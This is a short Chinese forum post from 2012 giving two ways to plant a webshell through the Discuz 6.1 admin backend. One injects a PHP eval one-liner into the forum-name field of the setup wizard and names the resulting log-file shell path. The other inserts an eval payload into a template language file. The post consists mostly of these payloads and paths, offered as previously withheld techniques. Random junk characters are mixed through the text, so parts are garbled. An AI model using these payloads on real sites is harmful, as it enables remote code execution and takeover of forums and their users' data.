discuz6.1两种方法后台拿shell
9 D9 M/ C7 r) u1 A1 W: f好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下4 f' x w( K' X. O( L, g+ A# x
1:
5 u8 _! L, f6 B1 i! T* v9 vhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
1 x* @1 I( \9 n) cadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
/ _' n1 `/ B1 } e& B, j<?php eval($_POST[cmd]);?>7 g8 l) k' A# I- I! O8 U; @& [& \
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
6 I* D. s' L$ c4 @- `. E& q" @" P+ u) |& R$ R
5 e& }9 w$ _. j7 I2 t: @
2:后台模板管理--默认模板套系--详情3 _* {! ^2 P% i9 E' w! C) c: n
templates/default/actions.lang.php
3 W c+ C! T3 J8 J9 ?jhackj\\');eval($_POST[cmd])?>;//
& Q/ e( X1 p5 H- q. ^7 ^9 x4 h, o, ^* b; s. T
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对